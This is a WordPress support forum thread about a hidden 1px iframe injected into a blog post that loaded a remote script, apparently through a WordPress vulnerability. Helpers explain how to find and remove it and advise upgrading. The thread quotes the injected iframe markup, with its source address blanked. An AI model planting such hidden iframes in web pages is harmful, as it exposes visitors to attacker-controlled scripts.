Support » Fixing WordPress » iframe injection problem?

  • Hi,

    I’ve searched around for a resolution to my problem but the closet thread I can find is this:

    Basically about a week ago my site began experiencing problems whenever I tried to access the home page > The screen just freezes for about 10 minutes..sometimes it also throws me out (closes the browser). In the browser footer it displays the following:

    waiting for http://xx.xx.xx.xx./iframe/wp-stats.php

    (the ‘x’ is an IP address which I don’t recognise)

    At first I suspected that it was a problem with the wp-stats plugin which I had just installed prior to this problem surfacing. So I removed the plugin (and other plugins)..I also tried other themes and browsers, but a wee alter and the problem still remains.

    So I contacted my host (as one of the threads here suggested I do) and they have reported to me the following:

    “Your site was most likely injected with a 1px iframe due to a vulnerability in WordPress — which is why 2.2.3 was rushed out and pushed out to everyone. A number of sites have the same link which leads one to believe it was due to an exploit in either WordPress itself or the theme you’re using (which has also been called into question as of late).”

    So now i’m wondering whether anyone can corroborate that this is the likely reason..and whether they is anything I can do to resolve the problem. I would of course like to upgrade to 2.3 asap, but I doubt this will solve the issue in itself..or will it?

    Any advise would be much appreciated.

    PS I am using the CSS Freak theme.

Viewing 15 replies - 1 through 15 (of 89 total)
  • what is the xx.xx…

    and you say the problem persists, after removing the stats plugin? I dont see the code on your site.

    Without seeing the xx.xx.xx.xx.. its hard to say much.

    that? that goes to China, thats prolly not good.

    Thread Starter lostplay



    Yes, that’s the IP address..

    Yep, I removed the wp-stats plugin because I originally assumed it was at fault and because I wanted to ensure that I had covered the basics before asking for advice.

    Thanks for the feedback – do you (or anyone else) have any ideas on how to resolve this?

    its not on your single post pages .. have you looked inside your theme files? I would start there with looking at index.php

    Look inside THIS post:

    Moderator Samuel Wood (Otto)

    (@otto42) Admin

    Step 1: Find where the code is being inserted. From what whooami is saying, it’s likely inside the content of one specific post. So look through that post and find and remove it.

    Step 2: Upgrade to the current latest WordPress version (2.2.3). This has no known security issues at this time.

    Step 3: Keep up to date on WordPress releases. On the main dashboard, you’ll always see new release information. Also, in WordPress 2.3 and up, WordPress itself will start telling you when your version is out of date and give you info on how to upgrade. So that will be good.

    Given that the code is inside a post’s content, then I’d say yeah, they likely did it through the exploit in version 2.2. Upgrade to 2.2.3, right now.

    Thread Starter lostplay


    whooami – you’re a star! There was the following iframe inside that post:

    <!– Traffic Statistics –>
    <iframe src= width=1 height=1 frameborder=0></iframe>
    <!– End Traffic Statistics –>

    So does this mean they were attempting to track my stats/traffic? Hmm..very nasty stuff. I have now removed it from that post.

    Otto42 – thankyou for your help and advice also! I’m going to do as you advice and upgrade asap.

    Thanks again, I suspect that you have both saved me hours of stress!

    So does this mean they were attempting to track my stats/traffic?

    who knows, it would almost be interesting to make up a site that forges a referer thats a wp blog and see if anything can be figured out. I really cant see anyway that they can gleam anything worthwhile.

    Thread Starter lostplay


    Hmm, it’s a strange one indeed. Anyway thanks for the headsup 🙂

    Happened today on 2.3.1 site. The injected code was:
    <!– Traffic Statistics –>
    <iframe src= width=1 height=1 frameborder=0></iframe>
    <!– End Traffic Statistics –>

    Inside wp-stats.php is JavaScript code. Host is in China. When can we expect a patch?

    Yup. The same thing happened to me. Running 2.3. I thought it must’ve been exploit for 2.3. But it turns out 2.3.1 is also vulnerable. I am not feeling too comfortable with this actually. And I just noticed it in a post I did 2 days ago!! Now I gotta go back and dig them out… Argh…

    Happened to me too.

    Glad to find others discussing this. I’ve just noticed the same thing turning up in my blog, running v2.3. Was about to update to 2.3.1 but I see from comments on here that it is vulnerable as well.

    Any idea what hole these are crawling through?

    Dion Hulse


    Meta Developer

    Can anyone take a read through their webservers access logs and look for anything suspect accessing the admin pages?
    Also check for other users, and change the admin passwords.
    It is hard to work out what is happening here without knowing where the problem is coming from.

    Inserting an iframe of that style is the common injection by at least one black hat seo ring — I’ve heard of that injection http://xx.xx.xx.xx./iframe/wp-stats.php being on on a Joomla! site.

    Columcille, it’s still advisable to upgrade to 2.3.1 as it does address security issues. Including what WP theme, plugins, and other s/w is running on your host will help isolate the vector of the exploit.

Viewing 15 replies - 1 through 15 (of 89 total)
  • The topic ‘iframe injection problem?’ is closed to new replies.